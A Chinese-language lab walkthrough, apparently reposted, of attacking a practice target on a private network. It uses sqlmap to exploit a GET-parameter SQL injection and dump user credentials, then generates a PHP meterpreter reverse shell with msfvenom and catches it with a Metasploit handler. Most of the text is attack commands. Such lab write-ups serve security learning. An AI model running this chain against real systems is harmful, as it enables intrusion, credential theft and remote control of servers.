GET sql注入


靶機地址:192.168.43.156
攻擊機地址:192.168.43.89
一、AppScan檢查靶機sql漏洞

 

 

二、使用sqlmap利用SQL注入漏洞
1.sqlmap -u " http://192.168.43.156/cat.php?id=1" –dbs 查看數據庫名

 

 

2.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" --tables 表名

 

 

3.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" --columns 查看字段

 

 

4.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" -C "login" --dump

 

 

用同種方法查找密碼
三、建立反彈shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機IP地址 lport=4444 -f raw

 

 

在桌面建一個文件shell.php

 

 

四、登錄后台頁面
剛在數據庫拿到的用戶名:admin
密碼需要用MD5解密為: P4ssw0rd

 

 

 

 

 

在kali系統內
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻擊機IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在頁面運行shell就可以就如靶機
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM